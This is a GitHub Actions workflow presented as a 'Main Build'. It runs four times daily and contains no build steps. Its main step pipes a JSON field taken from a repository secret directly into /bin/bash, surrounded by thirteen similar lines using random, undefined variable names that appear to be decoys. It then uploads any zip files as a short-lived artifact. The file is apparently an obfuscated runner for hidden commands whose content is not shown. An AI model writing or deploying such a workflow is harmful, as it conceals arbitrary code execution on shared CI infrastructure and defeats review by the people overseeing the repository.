name: Main Build
on:
  workflow_dispatch:

  schedule:
    - cron: '56 3,9,15,21 * * *'
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  check:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0
      - name: Main step
        env:
          n3: ${{ secrets.n3 }}
        run: |
          printf '%s' "$n3" | jq -r .hxq7 | /bin/bash
          echo $uzvsh81 | jq -r .tw0 | /bin/bash
          printf '%s' "$iqfb092" | jq -r .r878 | /bin/bash
          echo $oad7924 | jq -r .vsy0361 | /bin/bash
          printf '%s' "$kgpdx1522" | jq -r .k9800 | /bin/bash
          echo $xg0564 | jq -r .takc6358 | /bin/bash
          echo $uj48 | jq -r .rooe0446 | /bin/bash
          printf '%s' "$b934" | jq -r .jsn155 | /bin/bash
          echo $dazs03480 | jq -r .iymey22 | /bin/bash
          echo $pqyhc1 | jq -r .nv5720 | /bin/bash
          printf '%s' "$utlmz879" | jq -r .nxz69187 | /bin/bash
          echo $fqqp0718 | jq -r .qzt83219 | /bin/bash
          echo $hx32211 | jq -r .jzh56666 | /bin/bash
          echo $id9 | jq -r .uo4 | /bin/bash

      - name: Save data
        uses: actions/upload-artifact@v4
        with:
          name: e5Jzud30
          path: "*.zip"
          retention-days: 1
